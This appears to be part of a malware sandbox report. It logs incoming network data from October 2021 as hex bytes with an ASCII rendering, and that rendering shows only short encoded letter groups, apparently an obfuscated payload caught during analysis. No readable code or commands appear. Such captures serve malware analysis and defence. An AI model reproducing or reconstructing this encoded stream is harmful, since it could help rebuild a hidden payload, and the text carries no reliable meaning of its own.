2021-10-27 01:03:08 UTC	134	IN	Data Raw: 63 71 20 78 70 20 63 65 20 65 6a 63 20 71 78 78 20 71 71 63 20 71 71 77 20 71 68 4f 20 71 71 49 20 4f 6a 20 65 71 71 20 63 71 20 63 78 20 4f 78 20 71 68 68 20 77 68 20 71 68 65 20 71 71 78 20 4f 6a 20 71 78 77 20 63 71 20 63 78 20 70 65 20 71 77 63 20 71 4f 77 20 71 68 70 20 71 71 65 20 63 68 20 63 68 20 77 6a 20 71 49 4f 20 70 78 20 71 71 78 20 71 71 6a 20 49 63 20 71 71 71 20 78 70 20 77 63 20 71 77 68 20 63 78 20 70 78 20 71 71 70 20 71 71 68 20 49 78 20 71 71 70 20 65 68 20 63 77 20 6a 68 20 6a 49 20 71 65 77 20 71 71 6a 20 71 65 68 20 77 68 20 71 6a 49 20 63 4f 20 63 68 20 63 78 20 70 4f 20 71 70 6a 20 71 71 63 20 71 71 77 20 71 68 6a 20 6a 71 20 65 63 68 20 78 4f 20 63 68 20 78 70 20 70 49 20 71 71 70 20 65 49 20 71 6a 77 20 71 71 6a 20 63 68 20 63 Data Ascii: cq xp ce ejc qxx qqc qqw qhO qqI Oj eqq cq cx Ox qhh wh qhe qqx Oj qxw cq cx pe qwc qOw qhp qqe ch ch wj qIO px qqx qqj Ic qqq xp wc qwh cx px qqp qqh Ix qqp eh cw jh jI qew qqj qeh wh qjI cO ch cx pO qpj qqc qqw qhj jq ech xO ch xp pI qqp eI qjw qqj ch c
2021-10-27 01:03:08 UTC	139	IN	Data Raw: 49 20 63 78 20 70 78 20 71 71 70 20 71 68 70 20 49 78 20 71 68 65 20 65 68 20 63 49 20 65 49 20 71 4f 68 20 70 78 20 71 71 78 20 71 65 77 20 71 68 71 20 70 70 20 71 70 77 20 78 70 20 63 68 20 49 68 20 71 65 77 20 71 65 68 20 70 20 65 65 6a 20 71 71 65 20 63 68 20 63 65 20 65 63 20 65 71 63 20 70 70 20 70 4f 20 71 63 77 20 71 71 71 20 71 71 78 20 77 6a 20 71 6a 4f 20 63 68 20 63 78 20 70 68 20 65 4f 20 71 63 70 20 71 68 70 20 71 71 65 20 63 49 20 6a 70 20 6a 68 20 63 68 20 71 71 78 20 70 78 20 71 77 71 20 4f 4f 20 71 6a 20 71 6a 63 20 78 70 20 63 68 20 63 68 20 71 65 77 20 71 6a 6a 20 71 65 63 20 49 4f 20 65 63 68 20 63 68 20 78 70 20 63 49 20 65 6a 78 20 70 49 20 4f 20 65 6a 6a 20 71 68 4f 20 71 71 65 20 63 78 20 65 70 20 65 20 63 65 20 78 77 20 71 4f 65 Data Ascii: I cx px qqp qhp Ix qhe eh cI eI qOh px qqx qew qhq pp qpw xp ch Ih qew qeh p eej qqe ch ce ec eqc pp pO qcw qqq qqx wj qjO ch cx ph eO qcp qhp qqe cI jp jh ch qqx px qwq OO qj qjc xp ch ch qew qjj qec IO ech ch xp cI ejx pI O ejj qhO qqe cx ep e ce xw qOe
2021-10-27 01:03:08 UTC	143	IN	Data Raw: 71 71 65 20 63 65 20 4f 63 20 63 77 20 63 78 20 70 78 20 71 71 49 20 4f 6a 20 71 78 78 20 71 71 6a 20 63 68 20 63 70 20 65 78 20 63 78 20 70 78 20 71 71 78 20 63 4f 20 71 65 6a 20 70 70 20 71 70 68 20 78 70 20 63 68 20 78 70 20 78 65 20 49 4f 20 71 71 77 20 71 68 4f 20 71 71 49 20 6a 68 20 63 6a 20 65 49 20 71 78 68 20 70 78 20 71 71 78 20 71 71 63 20 77 71 20 71 71 63 20 65 20 63 70 20 63 68 20 6a 63 20 70 78 20 71 71 78 20 71 71 77 20 71 68 4f 20 71 71 65 20 63 68 20 78 70 20 78 70 20 78 65 20 49 49 20 4f 78 20 71 65 68 20 77 63 20 71 68 65 20 4f 6a 20 65 68 49 20 63 71 20 63 78 20 4f 78 20 4f 68 20 78 6a 20 71 68 4f 20 71 71 65 20 63 65 20 65 49 20 65 68 20 65 4f 20 71 49 63 20 71 71 78 20 71 71 77 20 71 68 4f 20 71 4f 49 20 63 68 20 78 70 20 63 68 20 Data Ascii: qqe ce Oc cw cx px qqI Oj qxx qqj ch cp ex cx px qqx cO qej pp qph xp ch xp xe IO qqw qhO qqI jh cj eI qxh px qqx qqc wq qqc e cp ch jc px qqx qqw qhO qqe ch xp xp xe II Ox qeh wc qhe Oj ehI cq cx Ox Oh xj qhO qqe ce eI eh eO qIc qqx qqw qhO qOI ch xp ch
2021-10-27 01:03:08 UTC	147	IN	Data Raw: 63 20 71 77 20 78 77 20 49 4f 20 65 71 78 20 49 65 20 71 77 4f 20 65 63 68 20 71 71 49 20 71 20 65 65 4f 20 71 77 49 20 71 77 65 20 4f 63 20 71 63 4f 20 63 63 20 68 20 4f 65 20 71 71 65 20 71 78 70 20 49 49 20 71 6a 78 20 78 68 20 78 6a 20 4f 71 20 65 63 6a 20 65 6a 20 4f 68 20 65 68 4f 20 77 77 20 71 65 49 20 71 78 71 20 71 78 4f 20 6a 65 20 4f 68 20 65 65 68 20 65 63 63 20 71 78 6a 20 63 4f 20 65 78 4f 20 77 49 20 49 77 20 6a 65 20 6a 49 20 63 4f 20 65 71 68 20 65 71 71 20 63 4f 20 65 78 70 20 71 6a 4f 20 71 65 70 20 71 4f 78 20 65 6a 77 20 65 63 68 20 71 6a 6a 20 78 78 20 71 68 68 20 71 6a 49 20 65 65 68 20 63 20 65 20 65 63 63 20 77 70 20 70 65 20 71 65 77 20 71 70 68 20 70 20 71 65 65 20 77 71 20 68 20 65 68 49 20 65 6a 20 65 20 4f 78 20 71 63 71 20 Data Ascii: c qw xw IO eqx Ie qwO ech qqI q eeO qwI qwe Oc qcO cc h Oe qqe qxp II qjx xh xj Oq ecj ej Oh ehO ww qeI qxq qxO je Oh eeh ecc qxj cO exO wI Iw je jI cO eqh eqq cO exp qjO qep qOx ejw ech qjj xx qhh qjI eeh c e ecc wp pe qew qph p qee wq h ehI ej e Ox qcq
2021-10-27 01:03:08 UTC	150	IN	Data Raw: 49 6a 20 65 71 68 20 65 71 71 20 71 77 6a 20 65 78 63 20 70 49 20 49 68 20 6a 71 20 6a 70 20 77 65 20 71 68 49 20 65 70 20 65 65 71 20 71 65 6a 20 65 6a 77 20 6a 4f 20 78 70 20 71 49 6a 20 65 71 65 20 65 63 65 20 77 71 20 71 71 71 20 49 49 20 71 65 68 20 71 6a 77 20 65 78 77 20 71 65 63 20 4f 70 20 63 63 20 71 4f 20 65 4f 20 6a 20 71 78 65 20 77 20 65 20 4f 70 20 71 63 77 20 70 4f 20 71 49 20 4f 4f 20 71 70 49 20 71 68 78 20 71 65 70 20 6a 65 20 70 78 20 78 63 20 6a 4f 20 65 68 77 20 71 78 63 20 63 4f 20 65 78 65 20 65 65 49 20 65 65 65 20 77 77 20 6a 77 20 71 68 77 20 71 77 68 20 71 6a 6a 20 4f 65 20 77 70 20 78 77 20 71 70 4f 20 71 77 20 71 6a 4f 20 63 49 20 71 68 20 65 77 20 71 77 6a 20 65 78 77 20 71 71 49 20 6a 68 20 65 68 63 20 65 71 78 20 78 6a 20 Data Ascii: Ij eqh eqq qwj exc pI Ih jq jp we qhI ep eeq qej ejw jO xp qIj eqe ece wq qqq II qeh qjw exw qec Op cc qO eO j qxe w e Op qcw pO qI OO qpI qhx qep je px xc jO ehw qxc cO exe eeI eee ww jw qhw qwh qjj Oe wp xw qpO qw qjO cI qh ew qwj exw qqI jh ehc eqx xj
2021-10-27 01:03:08 UTC	155	IN	Data Raw: 6a 63 20 4f 49 20 70 71 20 65 78 20 71 6a 6a 20 77 78 20 6a 63 20 65 63 20 71 63 71 20 65 63 71 20 65 71 68 20 77 20 65 65 63 20 71 71 6a 20 71 78 71 20 71 78 4f 20 65 63 71 20 71 4f 4f 20 78 68 20 71 77 78 20 71 68 68 20 65 71 4f 20 78 70 20 71 63 70 20 78 70 20 71 68 49 20 71 71 71 20 71 71 78 20 71 70 20 71 68 68 20 71 63 65 20 6a 70 20 71 49 65 20 70 63 20 71 65 65 20 78 4f 20 71 49 70 20 65 71 6a 20 71 68 77 20 63 71 20 71 70 63 20 71 4f 6a 20 63 63 20 71 63 49 20 65 78 49 20 71 78 68 20 71 68 4f 20 68 20 65 6a 49 20 4f 20 71 78 68 20 71 49 20 65 71 20 65 68 63 20 65 71 78 20 71 68 20 78 70 20 65 71 70 20 71 63 6a 20 65 63 65 20 6a 4f 20 71 65 49 20 71 4f 68 20 71 65 49 20 71 49 71 20 71 4f 68 20 4f 65 20 71 4f 78 20 65 68 70 20 65 71 70 20 71 68 6a Data Ascii: jc OI pq ex qjj wx jc ec qcq ecq eqh w eec qqj qxq qxO ecq qOO xh qwx qhh eqO xp qcp xp qhI qqq qqx qp qhh qce jp qIe pc qee xO qIp eqj qhw cq qpc qOj cc qcI exI qxh qhO h ejI O qxh qI eq ehc eqx qh xp eqp qcj ece jO qeI qOh qeI qIq qOh Oe qOx ehp eqp qhj
2021-10-27 01:03:08 UTC	158	IN	Data Raw: 70 77 20 77 71 20 71 49 68 20 71 65 63 20 71 70 63 20 65 6a 4f 20 68 20 65 71 68 20 78 70 20 71 77 6a 20 71 65 6a 20 71 77 6a 20 65 68 78 20 71 71 77 20 71 6a 70 20 70 70 20 65 65 4f 20 71 70 6a 20 71 49 6a 20 71 6a 68 20 71 65 6a 20 71 77 77 20 71 4f 20 71 6a 78 20 71 71 6a 20 71 65 77 20 78 70 20 65 68 77 20 71 78 63 20 71 77 20 71 63 63 20 6a 77 20 71 49 78 20 71 78 6a 20 70 20 71 77 70 20 78 4f 20 65 78 71 20 77 49 20 70 4f 20 71 68 77 20 71 63 77 20 71 63 70 20 70 6a 20 65 78 70 20 68 20 71 49 78 20 4f 68 20 63 65 20 65 4f 20 6a 6a 20 78 63 20 77 20 71 78 4f 20 71 68 63 20 71 49 65 20 71 63 4f 20 70 71 20 70 70 20 4f 4f 20 71 49 77 20 71 77 70 20 49 65 20 78 63 20 71 78 71 20 71 78 77 20 4f 6a 20 71 70 4f 20 71 71 63 20 71 71 49 20 65 78 4f 20 71 49 Data Ascii: pw wq qIh qec qpc ejO h eqh xp qwj qej qwj ehx qqw qjp pp eeO qpj qIj qjh qej qww qO qjx qqj qew xp ehw qxc qw qcc jw qIx qxj p qwp xO exq wI pO qhw qcw qcp pj exp h qIx Oh ce eO jj xc w qxO qhc qIe qcO pq pp OO qIw qwp Ie xc qxq qxw Oj qpO qqc qqI exO qI
2021-10-27 01:03:08 UTC	163	IN	Data Raw: 70 78 20 65 78 4f 20 71 65 78 20 63 65 20 71 71 65 20 63 65 20 78 70 20 71 77 78 20 49 6a 20 71 6a 20 71 71 78 20 71 71 63 20 71 68 4f 20 71 4f 65 20 63 4f 20 65 65 78 20 63 4f 20 78 70 20 70 78 20 71 6a 68 20 71 65 78 20 71 70 4f 20 71 65 71 20 63 65 20 78 70 20 63 77 20 49 68 20 71 6a 65 20 71 65 6a 20 71 71 63 20 71 68 4f 20 70 4f 20 63 49 20 65 65 78 20 63 4f 20 78 70 20 70 78 20 77 78 20 71 65 77 20 71 70 4f 20 71 65 71 20 63 65 20 78 70 20 4f 70 20 49 68 20 78 70 20 71 65 68 20 71 71 63 20 71 68 4f 20 65 78 6a 20 63 49 20 70 78 20 63 49 20 78 70 20 70 78 20 65 65 77 20 71 65 77 20 4f 20 71 65 65 20 63 65 20 78 70 20 71 77 71 20 49 68 20 71 6a 20 71 71 78 20 71 71 63 20 71 68 4f 20 65 65 71 20 63 49 20 71 68 63 20 63 68 20 78 70 20 70 78 20 65 68 63 Data Ascii: px exO qex ce qqe ce xp qwx Ij qj qqx qqc qhO qOe cO eex cO xp px qjh qex qpO qeq ce xp cw Ih qje qej qqc qhO pO cI eex cO xp px wx qew qpO qeq ce xp Op Ih xp qeh qqc qhO exj cI px cI xp px eew qew O qee ce xp qwq Ih qj qqx qqc qhO eeq cI qhc ch xp px ehc
2021-10-27 01:03:08 UTC	166	IN	Data Raw: 78 20 70 63 20 71 65 6a 20 71 71 65 20 63 68 20 65 78 4f 20 63 71 20 71 70 68 20 70 78 20 6a 4f 20 71 71 49 20 71 68 68 20 71 71 6a 20 63 68 20 78 70 20 71 78 20 6a 65 20 70 78 20 71 71 78 20 71 65 78 20 71 71 68 20 65 78 65 20 63 68 20 71 68 4f 20 63 71 20 63 78 20 70 63 20 4f 70 20 71 71 77 20 63 6a 20 71 68 65 20 63 68 20 78 70 20 65 63 71 20 63 63 20 65 71 68 20 71 71 78 20 78 68 20 71 68 70 20 71 65 71 20 63 71 20 78 70 20 63 68 20 71 4f 68 20 49 49 20 71 71 78 20 71 71 77 20 71 68 68 20 71 71 63 20 71 70 71 20 78 70 20 70 71 20 63 63 20 70 63 20 71 71 63 20 71 71 77 20 71 68 4f 20 65 68 68 20 6a 49 20 78 70 20 63 68 20 65 63 63 20 70 63 20 65 63 71 20 71 71 77 20 71 78 20 71 71 6a 20 63 71 20 78 4f 20 63 68 20 63 78 20 71 65 70 20 71 68 68 20 71 71 Data Ascii: x pc qej qqe ch exO cq qph px jO qqI qhh qqj ch xp qx je px qqx qex qqh exe ch qhO cq cx pc Op qqw cj qhe ch xp ecq cc eqh qqx xh qhp qeq cq xp ch qOh II qqx qqw qhh qqc qpq xp pq cc pc qqc qqw qhO ehh jI xp ch ecc pc ecq qqw qx qqj cq xO ch cx qep qhh qq
2021-10-27 01:03:08 UTC	171	IN	Data Raw: 65 20 71 63 71 20 63 71 20 70 63 20 71 71 78 20 65 71 6a 20 65 6a 63 20 65 71 70 20 63 63 20 78 4f 20 63 68 20 65 6a 68 20 65 71 68 20 65 65 71 20 71 71 65 20 71 68 70 20 71 71 65 20 63 68 20 71 70 6a 20 71 63 65 20 63 78 20 70 63 20 71 71 78 20 71 68 63 20 65 6a 78 20 65 78 77 20 63 71 20 78 4f 20 63 68 20 71 78 20 65 71 71 20 65 78 63 20 71 71 49 20 71 68 70 20 71 71 65 20 71 68 65 20 71 70 6a 20 71 63 65 20 63 78 20 70 63 20 71 71 78 20 65 78 71 20 65 6a 78 20 65 78 77 20 63 71 20 78 4f 20 63 68 20 71 6a 68 20 65 71 71 20 65 78 63 20 71 71 49 20 71 68 70 20 71 71 65 20 65 71 78 20 71 70 6a 20 71 70 71 20 63 63 20 70 63 20 71 71 78 20 4f 77 20 65 65 4f 20 71 4f 49 20 63 63 20 78 4f 20 63 68 20 49 20 65 65 68 20 65 68 65 20 71 71 65 20 71 68 70 20 71 71 Data Ascii: e qcq cq pc qqx eqj ejc eqp cc xO ch ejh eqh eeq qqe qhp qqe ch qpj qce cx pc qqx qhc ejx exw cq xO ch qx eqq exc qqI qhp qqe qhe qpj qce cx pc qqx exq ejx exw cq xO ch qjh eqq exc qqI qhp qqe eqx qpj qpq cc pc qqx Ow eeO qOI cc xO ch I eeh ehe qqe qhp qq
2021-10-27 01:03:08 UTC	175	IN	Data Raw: 78 20 70 78 20 71 71 78 20 71 71 77 20 71 71 20 71 71 63 20 71 63 63 20 65 6a 20 71 71 65 20 63 63 20 71 65 49 20 71 71 78 20 65 78 4f 20 49 49 20 71 71 65 20 63 68 20 78 70 20 63 68 20 70 68 20 70 77 20 71 65 68 20 4f 6a 20 71 68 78 20 71 71 6a 20 6a 71 20 78 70 20 71 63 78 20 65 63 20 70 78 20 71 71 78 20 71 71 77 20 71 68 4f 20 65 65 20 78 4f 20 6a 20 65 49 20 70 71 20 70 78 20 4f 65 20 71 71 77 20 65 65 71 20 4f 63 20 63 68 20 78 70 20 63 68 20 63 78 20 49 4f 20 71 68 49 20 71 65 63 20 71 71 4f 20 63 65 20 63 68 20 6a 68 20 63 68 20 71 71 68 20 71 68 68 20 71 71 78 20 71 71 77 20 71 68 4f 20 71 71 65 20 6a 49 20 78 70 20 65 20 6a 71 20 78 20 71 71 63 20 4f 71 20 71 68 4f 20 65 68 68 20 65 20 78 70 20 63 68 20 63 78 20 70 78 20 71 68 68 20 71 71 77 20 Data Ascii: x px qqx qqw qq qqc qcc ej qqe cc qeI qqx exO II qqe ch xp ch ph pw qeh Oj qhx qqj jq xp qcx ec px qqx qqw qhO ee xO j eI pq px Oe qqw eeq Oc ch xp ch cx IO qhI qec qqO ce ch jh ch qqh qhh qqx qqw qhO qqe jI xp e jq x qqc Oq qhO ehh e xp ch cx px qhh qqw
2021-10-27 01:03:08 UTC	178	IN	Data Raw: 20 71 68 78 20 4f 4f 20 63 78 20 70 78 20 71 71 78 20 71 71 77 20 71 65 78 20 71 71 65 20 71 70 77 20 71 71 6a 20 71 77 49 20 63 65 20 63 78 20 71 71 78 20 71 6a 6a 20 49 68 20 71 71 65 20 63 68 20 78 70 20 63 68 20 6a 4f 20 70 78 20 71 6a 71 20 63 65 20 65 6a 4f 20 71 71 78 20 70 49 20 78 70 20 71 70 49 20 71 68 68 20 70 78 20 71 71 78 20 71 71 77 20 71 68 4f 20 4f 77 20 63 68 20 71 68 63 20 71 71 65 20 71 4f 68 20 70 49 20 65 68 20 71 71 77 20 65 68 4f 20 6a 78 20 63 68 20 78 70 20 63 68 20 63 78 20 49 4f 20 71 71 78 20 71 70 68 20 78 77 20 65 65 78 20 78 70 20 70 70 20 63 68 20 4f 68 20 77 20 71 71 78 20 71 71 77 20 71 68 4f 20 71 71 65 20 6a 63 20 78 70 20 49 6a 20 71 71 77 20 71 49 20 71 71 78 20 65 70 20 71 68 4f 20 71 68 78 20 71 68 65 20 78 70 20 Data Ascii: qhx OO cx px qqx qqw qex qqe qpw qqj qwI ce cx qqx qjj Ih qqe ch xp ch jO px qjq ce ejO qqx pI xp qpI qhh px qqx qqw qhO Ow ch qhc qqe qOh pI eh qqw ehO jx ch xp ch cx IO qqx qph xw eex xp pp ch Oh w qqx qqw qhO qqe jc xp Ij qqw qI qqx ep qhO qhx qhe xp
2021-10-27 01:03:08 UTC	183	IN	Data Raw: 63 65 20 77 70 20 71 71 4f 20 71 63 70 20 71 71 65 20 71 6a 70 20 49 49 20 63 68 20 63 78 20 4f 65 20 71 71 78 20 65 65 70 20 71 68 4f 20 65 71 6a 20 70 65 20 71 65 20 78 70 20 71 4f 77 20 70 78 20 77 68 20 49 20 71 68 4f 20 71 71 65 20 63 68 20 78 70 20 71 49 6a 20 63 78 20 71 65 4f 20 71 70 20 71 6a 63 20 71 71 68 20 71 6a 71 20 63 68 20 4f 49 20 49 63 20 63 78 20 70 78 20 71 71 78 20 71 71 77 20 65 6a 63 20 71 68 78 20 71 4f 6a 20 78 65 20 70 63 20 63 78 20 71 49 68 20 71 71 78 20 65 63 20 6a 68 20 71 71 65 20 63 68 20 63 49 20 63 68 20 71 49 63 20 70 78 20 77 71 20 65 68 20 71 78 70 20 71 71 63 20 71 4f 70 20 78 70 20 65 71 68 20 49 4f 20 70 78 20 71 71 78 20 71 71 77 20 71 68 4f 20 65 78 49 20 78 65 20 71 4f 63 20 78 68 20 70 71 20 70 78 20 71 6a 78 Data Ascii: ce wp qqO qcp qqe qjp II ch cx Oe qqx eep qhO eqj pe qe xp qOw px wh I qhO qqe ch xp qIj cx qeO qp qjc qqh qjq ch OI Ic cx px qqx qqw ejc qhx qOj xe pc cx qIh qqx ec jh qqe ch cI ch qIc px wq eh qxp qqc qOp xp eqh IO px qqx qqw qhO exI xe qOc xh pq px qjx
2021-10-27 01:03:08 UTC	187	IN	Data Raw: 78 20 71 71 77 20 71 68 4f 20 71 71 65 20 6a 49 20 78 70 20 4f 63 20 77 49 20 71 68 78 20 71 71 65 20 49 70 20 71 68 70 20 77 65 20 71 78 63 20 78 70 20 63 68 20 63 78 20 70 78 20 71 68 68 20 71 71 77 20 65 65 68 20 71 68 20 71 78 20 63 68 20 6a 20 63 63 20 78 70 20 65 68 4f 20 71 71 77 20 71 68 4f 20 71 71 65 20 63 68 20 6a 70 20 63 68 20 71 4f 63 20 78 49 20 77 70 20 71 71 4f 20 4f 65 20 71 71 6a 20 71 49 65 20 71 78 77 20 63 68 20 63 78 20 70 78 20 71 71 78 20 4f 4f 20 71 68 4f 20 77 6a 20 77 6a 20 71 65 20 78 70 20 77 20 70 63 20 65 68 49 20 65 71 78 20 71 68 4f 20 71 71 65 20 63 68 20 78 70 20 6a 49 20 63 78 20 78 71 20 4f 20 71 78 68 20 71 71 68 20 49 63 20 63 71 20 65 71 49 20 71 78 63 20 63 78 20 70 78 20 71 71 78 20 71 71 77 20 71 65 6a 20 71 71 Data Ascii: x qqw qhO qqe jI xp Oc wI qhx qqe Ip qhp we qxc xp ch cx px qhh qqw eeh qh qx ch j cc xp ehO qqw qhO qqe ch jp ch qOc xI wp qqO Oe qqj qIe qxw ch cx px qqx OO qhO wj wj qe xp w pc ehI eqx qhO qqe ch xp jI cx xq O qxh qqh Ic cq eqI qxc cx px qqx qqw qej qq
2021-10-27 01:03:08 UTC	191	IN	Data Raw: 78 20 6a 71 20 63 63 20 63 6a 20 71 71 63 20 78 71 20 65 71 77 20 71 71 65 20 63 68 20 78 70 20 63 68 20 78 70 20 70 78 20 71 63 70 20 65 65 63 20 4f 65 20 71 71 70 20 70 68 20 78 4f 20 77 78 20 71 6a 68 20 70 78 20 71 71 78 20 71 71 77 20 71 68 4f 20 71 71 70 20 63 68 20 78 78 20 71 49 77 20 71 78 20 70 65 20 71 49 20 71 71 49 20 65 78 4f 20 71 4f 49 20 63 68 20 78 70 20 63 68 20 63 78 20 70 63 20 71 71 78 20 65 4f 20 65 78 70 20 65 6a 20 63 68 20 70 6a 20 63 71 20 71 63 78 20 65 65 63 20 71 71 78 20 71 71 77 20 71 68 4f 20 71 71 65 20 63 65 20 78 70 20 71 70 65 20 71 49 6a 20 71 71 63 20 71 71 63 20 65 65 20 71 68 70 20 68 20 71 6a 65 20 78 70 20 63 68 20 63 78 20 70 78 20 71 71 63 20 71 71 77 20 71 70 71 20 65 65 4f 20 65 71 20 78 4f 20 70 77 20 63 63 Data Ascii: x jq cc cj qqc xq eqw qqe ch xp ch xp px qcp eec Oe qqp ph xO wx qjh px qqx qqw qhO qqp ch xx qIw qx pe qI qqI exO qOI ch xp ch cx pc qqx eO exp ej ch pj cq qcx eec qqx qqw qhO qqe ce xp qpe qIj qqc qqc ee qhp h qje xp ch cx px qqc qqw qpq eeO eq xO pw cc
2021-10-27 01:03:08 UTC	195	IN	Data Raw: 20 71 77 68 20 65 77 20 63 68 20 63 78 20 70 63 20 71 71 78 20 71 78 71 20 77 68 20 71 71 65 20 63 68 20 63 68 20 63 68 20 6a 78 20 71 65 68 20 71 71 78 20 71 71 77 20 71 71 68 20 71 71 65 20 65 20 65 70 20 63 68 20 63 78 20 70 63 20 71 71 78 20 4f 20 49 63 20 71 71 65 20 63 68 20 63 68 20 63 68 20 71 77 78 20 71 65 68 20 71 71 78 20 71 71 77 20 71 71 68 20 71 71 65 20 71 6a 78 20 65 70 20 63 68 20 63 78 20 70 63 20 71 71 78 20 71 6a 20 49 78 20 71 71 65 20 63 68 20 78 4f 20 63 68 20 71 6a 78 20 71 65 71 20 71 71 78 20 71 71 77 20 71 68 70 20 71 71 65 20 63 78 20 6a 68 20 63 68 20 63 78 20 70 63 20 71 71 78 20 78 63 20 49 77 20 71 71 65 20 63 68 20 78 4f 20 63 68 20 65 63 78 20 71 65 65 20 71 71 78 20 71 71 77 20 71 68 70 20 71 71 65 20 65 71 78 20 6a 68 Data Ascii: qwh ew ch cx pc qqx qxq wh qqe ch ch ch jx qeh qqx qqw qqh qqe e ep ch cx pc qqx O Ic qqe ch ch ch qwx qeh qqx qqw qqh qqe qjx ep ch cx pc qqx qj Ix qqe ch xO ch qjx qeq qqx qqw qhp qqe cx jh ch cx pc qqx xc Iw qqe ch xO ch ecx qee qqx qqw qhp qqe eqx jh
2021-10-27 01:03:08 UTC	199	IN	Data Raw: 71 71 65 20 65 6a 63 20 4f 68 20 63 68 20 63 78 20 70 63 20 71 71 78 20 65 78 68 20 49 20 71 71 65 20 63 68 20 78 4f 20 63 68 20 65 6a 71 20 49 6a 20 71 71 78 20 71 71 77 20 71 71 71 20 71 71 65 20 63 71 20 4f 65 20 63 68 20 63 78 20 70 63 20 71 71 78 20 71 70 68 20 71 20 71 71 65 20 63 68 20 78 4f 20 63 68 20 71 71 20 63 77 20 71 71 78 20 71 71 77 20 71 71 71 20 71 71 65 20 71 68 77 20 4f 6a 20 63 68 20 63 78 20 70 63 20 71 71 78 20 65 68 70 20 68 20 71 71 65 20 63 68 20 78 4f 20 63 68 20 65 6a 20 63 70 20 71 71 78 20 71 71 77 20 71 68 70 20 71 71 65 20 4f 63 20 4f 78 20 63 68 20 63 78 20 70 49 20 71 71 78 20 65 63 65 20 6a 20 71 71 65 20 63 68 20 63 71 20 63 68 20 71 78 77 20 63 70 20 71 71 78 20 71 71 77 20 71 68 63 20 71 71 65 20 65 78 6a 20 4f 78 20 Data Ascii: qqe ejc Oh ch cx pc qqx exh I qqe ch xO ch ejq Ij qqx qqw qqq qqe cq Oe ch cx pc qqx qph q qqe ch xO ch qq cw qqx qqw qqq qqe qhw Oj ch cx pc qqx ehp h qqe ch xO ch ej cp qqx qqw qhp qqe Oc Ox ch cx pI qqx ece j qqe ch cq ch qxw cp qqx qqw qhc qqe exj Ox
2021-10-27 01:03:08 UTC	203	IN	Data Raw: 63 49 20 63 78 20 65 63 20 71 71 78 20 71 65 6a 20 71 68 4f 20 6a 77 20 63 68 20 6a 49 20 63 68 20 71 68 77 20 70 78 20 70 68 20 71 71 77 20 49 68 20 71 71 65 20 65 63 20 78 70 20 70 6a 20 63 78 20 71 65 71 20 71 71 78 20 78 78 20 71 68 4f 20 77 68 20 63 68 20 71 65 71 20 63 68 20 65 63 63 20 70 71 20 71 65 4f 20 71 71 71 20 71 68 20 71 71 65 20 71 6a 71 20 78 4f 20 71 4f 6a 20 78 78 20 63 71 20 71 71 78 20 71 65 20 71 68 70 20 71 6a 71 20 78 68 20 71 68 77 20 63 6a 20 71 77 63 20 70 78 20 65 65 77 20 70 78 20 71 6a 77 20 71 71 65 20 71 77 71 20 78 70 20 71 77 6a 20 65 6a 20 71 77 49 20 71 71 78 20 65 6a 49 20 71 68 4f 20 71 4f 78 20 71 4f 20 65 71 77 20 63 68 20 71 63 4f 20 70 78 20 78 4f 20 70 65 20 70 78 20 71 71 6a 20 71 63 63 20 78 70 20 4f 4f 20 71 Data Ascii: cI cx ec qqx qej qhO jw ch jI ch qhw px ph qqw Ih qqe ec xp pj cx qeq qqx xx qhO wh ch qeq ch ecc pq qeO qqq qh qqe qjq xO qOj xx cq qqx qe qhp qjq xh qhw cj qwc px eew px qjw qqe qwq xp qwj ej qwI qqx ejI qhO qOx qO eqw ch qcO px xO pe px qqj qcc xp OO q
2021-10-27 01:03:08 UTC	207	IN	Data Raw: 71 20 71 71 78 20 65 71 65 20 71 71 71 20 71 78 71 20 71 63 6a 20 71 49 68 20 78 70 20 71 63 71 20 70 49 20 77 71 20 65 71 77 20 71 63 68 20 71 65 78 20 65 71 4f 20 63 68 20 71 65 20 71 63 78 20 65 78 70 20 71 71 65 20 63 77 20 71 68 4f 20 78 65 20 71 63 70 20 49 65 20 63 49 20 65 71 63 20 70 49 20 71 65 4f 20 71 71 71 20 78 20 71 71 70 20 71 77 4f 20 63 68 20 71 4f 6a 20 78 78 20 71 68 4f 20 71 71 70 20 65 78 78 20 71 71 71 20 71 70 20 71 63 70 20 71 77 65 20 63 68 20 71 70 6a 20 70 49 20 6a 68 20 65 71 77 20 6a 4f 20 71 71 49 20 71 6a 71 20 63 71 20 49 70 20 71 63 78 20 77 65 20 71 65 77 20 71 63 49 20 71 68 4f 20 65 63 71 20 71 63 70 20 71 70 20 49 6a 20 77 71 20 70 49 20 65 65 49 20 65 71 77 20 71 4f 70 20 71 71 63 20 49 77 20 63 68 20 71 49 77 20 71 Data Ascii: q qqx eqe qqq qxq qcj qIh xp qcq pI wq eqw qch qex eqO ch qe qcx exp qqe cw qhO xe qcp Ie cI eqc pI qeO qqq x qqp qwO ch qOj xx qhO qqp exx qqq qp qcp qwe ch qpj pI jh eqw jO qqI qjq cq Ip qcx we qew qcI qhO ecq qcp qp Ij wq pI eeI eqw qOp qqc Iw ch qIw q
2021-10-27 01:03:08 UTC	210	IN	Data Raw: 6a 20 78 78 20 65 78 71 20 4f 4f 20 71 78 68 20 71 71 71 20 71 65 4f 20 71 63 65 20 63 63 20 63 78 20 4f 63 20 70 71 20 65 68 20 65 71 49 20 71 4f 70 20 4f 77 20 70 6a 20 63 68 20 65 71 70 20 78 65 20 65 6a 71 20 4f 4f 20 78 78 20 71 68 78 20 65 77 20 71 6a 68 20 71 63 49 20 78 70 20 71 6a 63 20 70 49 20 71 65 4f 20 71 71 71 20 71 68 20 71 71 65 20 65 68 6a 20 63 68 20 49 78 20 71 6a 78 20 65 68 68 20 71 71 78 20 71 78 68 20 71 71 71 20 71 78 65 20 71 63 65 20 71 4f 77 20 63 49 20 65 71 63 20 70 78 20 71 65 4f 20 71 71 71 20 71 68 20 71 71 65 20 63 4f 20 78 4f 20 77 6a 20 71 6a 78 20 71 71 70 20 71 65 77 20 4f 20 71 68 4f 20 49 68 20 71 63 63 20 71 71 78 20 63 77 20 71 71 4f 20 70 49 20 65 6a 71 20 65 71 77 20 4f 77 20 4f 70 20 71 63 63 20 63 71 20 71 4f Data Ascii: j xx exq OO qxh qqq qeO qce cc cx Oc pq eh eqI qOp Ow pj ch eqp xe ejq OO xx qhx ew qjh qcI xp qjc pI qeO qqq qh qqe ehj ch Ix qjx ehh qqx qxh qqq qxe qce qOw cI eqc px qeO qqq qh qqe cO xO wj qjx qqp qew O qhO Ih qcc qqx cw qqO pI ejq eqw Ow Op qcc cq qO
